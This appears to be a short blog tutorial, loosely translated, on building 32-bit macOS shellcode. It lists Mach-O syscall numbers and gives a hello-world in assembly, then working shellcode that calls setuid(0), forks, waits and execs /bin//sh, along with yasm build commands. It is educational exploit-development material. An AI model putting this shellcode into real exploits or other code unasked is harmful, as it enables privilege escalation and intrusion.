How-to make an 32-bit OSX shellcode

We will make a basic shellcode (setuid + fork + execve wait4 +) for 32-bit Intel architecture. The first is to check the syscall.h file.

      Kana:osx capi_x$ cat /usr/include/sys/syscall.h

      #ifdef __APPLE_API_PRIVATE
      #define SYS_syscall        0
      #define SYS_exit           1
      #define SYS_fork           2
      #define SYS_read           3
      #define SYS_write          4
      #define SYS_open           5
      #define SYS_close          6
      #define SYS_wait4          7

This is a small proof of concept (a "hello girls" in asm) demonstrated the feasibility via INT 80h.

      section .text
          global _start

      _start:
          push len
          push msg
          push 0x1
          mov eax, 0x4
          sub esp, 0x4    ; Stack align
          int 0x80        ; write
          mov eax, 0x1
          sub esp, 0x4
          int 0x80        ; exit

      section .data
          msg db 'Hola nenas!', 0xa
          len equ $ - msg

      Kana:osx capi_x$ file hello
      hello: Mach-O executable i386

      Kana:osx capi_x$ ./hello
      Hola nenas!

Looking at the results, it should be a shellcode such as whole life, taking care of esp and compiling for 32bit Match-O.
And here is the result, nothing really awesome, but it sure someday is useful :-)

      section .text
              global _start

      _start:
              xor     eax, eax
              push    eax
              push    eax
              mov     al, 23
              int     0x80    ; setuid
              pop     eax
              inc     eax
              inc     eax
              int     0x80    ; fork
              pop     ebx
              push    eax
              push    ebx
              push    ebx
              push    ebx
              push    eax
              xor     eax, eax
              mov     al,7
              push    eax
              int     0x80    ; wait4
              xor     eax, eax
              push    eax
              push    0x68732f2f ; //sh
              push    0x6e69622f ; /bin
              mov     ebx, esp
              push    eax
              push    esp
              push    esp
              push    ebx
              mov     al, 0x3b
              push    eax
              int     0x80    ; execve

I will compile them with yasm, which has support for 64 bit :-)

      yasm -f macho32 forkexecve32.s -o forkexecve32.o
      ld -static forkexecve32.o -o forkexecve32

Happy Hacking!
–
“No user serviceable parts included.”